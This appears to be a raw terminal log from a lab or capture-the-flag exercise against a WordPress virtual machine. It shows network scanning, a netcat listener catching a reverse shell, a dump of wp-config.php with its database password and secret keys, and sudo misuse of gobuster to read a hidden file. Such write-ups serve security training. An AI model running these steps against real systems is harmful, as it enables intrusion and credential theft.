3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.072 seconds (123.55 hosts/sec). 3 responded
┌──(root㉿kali)-[~] └─# nmap 192.168.56.118 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 22:48 EST Nmap scan report for 192.168.56.118 Host is up (0.000080s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:1F:A3:AC (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 3.01 seconds
┌──(root㉿kali)-[~] └─# nc -lvnp 1234 listening on [any] 1234 ... connect to [192.168.56.102] from (UNKNOWN) [192.168.56.118] 49124 python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@listen:~/html/wordpress$ ls ls index.php wp-blog-header.php wp-includes wp-signup.php license.txt wp-comments-post.php wp-links-opml.php wp-trackback.php readme.html wp-config-sample.php wp-load.php xmlrpc.php update_url.php wp-config.php wp-login.php wp-activate.php wp-content wp-mail.php wp-admin wp-cron.php wp-settings.php www-data@listen:~/html/wordpress$ cat wp-config.php cat wp-config.php <?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'wordpress' ); /** Database username */ define( 'DB_USER', 'll104567' ); /** Database password */ define( 'DB_PASSWORD', 'thehandsomeguy' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this ifin doubt. */ define( 'DB_COLLATE', '' );
/**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to login again. * * @since 2.6.0 */ define( 'AUTH_KEY', '2Ryf <:T/-4,9h?q%jDi(HKG_*1xH-nU+-//7[1H}zD@=q0ls8junY(~.MG@D[$S' ); define( 'SECURE_AUTH_KEY', '}z]MVJ|P5~X1!+76?dT?s|@A,92D4/+phWkWb=;I+k{_y)7,A,<=5|&z<tE:`HET' ); define( 'LOGGED_IN_KEY', 'p4w9>FcR>{+u:M,M4rT}VIW.[Pg=UZjzp8n{-/&F;j!nC49f-^~$unsry+lHW w!' ); define( 'NONCE_KEY', ';qi?~eGux58*l4NoDh@?<`^B6!HK{G:C85Hv8sC6<t,y}8veV4pvs#{ [[T?s123' ); define( 'AUTH_SALT', 'l2^yBli3l_G#J<T 2p}e#bS>j_=,!06$%qYd#I<p22c:z&`s?ic;7UxS$T6c{HXr' ); define( 'SECURE_AUTH_SALT', '<;95CFam*#)^qbL)a,KZXrqS$!]Ln^2yF2wg#Fa?9F<D)-,irw&nj/$pB)BR1u|O' ); define( 'LOGGED_IN_SALT', 'JaR6i0q<wZMJD-7HwE:7ZwtNxV$BJ%15=8~Bw(_jCL_`+<`^asIdv=$Yo81jE19K' ); define( 'NONCE_SALT', 'q!5K2-Q*^%Tf<lz)*o0&8/CCjU;8-jdLS4,*5vk/8,^j&]<S7+I&eO55C_CM6N@L' );
/**#@-*/
/** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = 'wp_';
/** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; if ( file_exists(ABSPATH . 'update-url.php') ) { include_once(ABSPATH . 'update-url.php'); } www-data@listen:~/html/wordpress$
MariaDB [(none)]> use wordpress use wordpress Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
welcome@listen:/opt$ sudo gobuster -h sudo gobuster -h Usage of gobuster: -P string Password for Basic Auth (dir mode only) -U string Username for Basic Auth (dir mode only) -a string Set the User-Agent string (dir mode only) -c string Cookies to use for the requests (dir mode only) -cn Show CNAME records (dns mode only, cannot be used with '-i' option) -e Expanded mode, print full URLs -f Append a forward-slash to each directory request (dir mode only) -fw Force continued operation when wildcard found -i Show IP addresses (dns mode only) -k Skip SSL certificate verification -l Include the length of the body in the output (dir mode only) -m string Directory/File mode (dir) or DNS mode (dns) (default "dir") -n Don't print status codes -np Don't display progress -o string Output file to write results to (defaults to stdout) -p string Proxy to use for requests [http(s)://host:port] (dir mode only) -q Don't print the banner and other noise -r Follow redirects -s string Positive status codes (dir mode only) (default "200,204,301,302,307,403") -t int Number of concurrent threads (default 10) -to duration HTTP Timeout in seconds (dir mode only) (default 10s) -u string The target URL or Domain -v Verbose output (errors) -w string Path to the wordlist -x string File extension(s) to search for (dir mode only) welcome@listen:/opt$ sudo gobuster -w /opt/.test.sh -u http://192.168.56.102 sudo gobuster -w /opt/.test.sh -u http://192.168.56.102 ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://192.168.56.102/ [+] Threads : 10 [+] Wordlist : /opt/.test.sh [+] Status codes : 200,204,301,302,307,403 [+] Timeout : 10s ===================================================== 2025/01/24 23:33:56 Starting gobuster ===================================================== ===================================================== 2025/01/24 23:33:56 Finished ===================================================== welcome@listen:/opt$
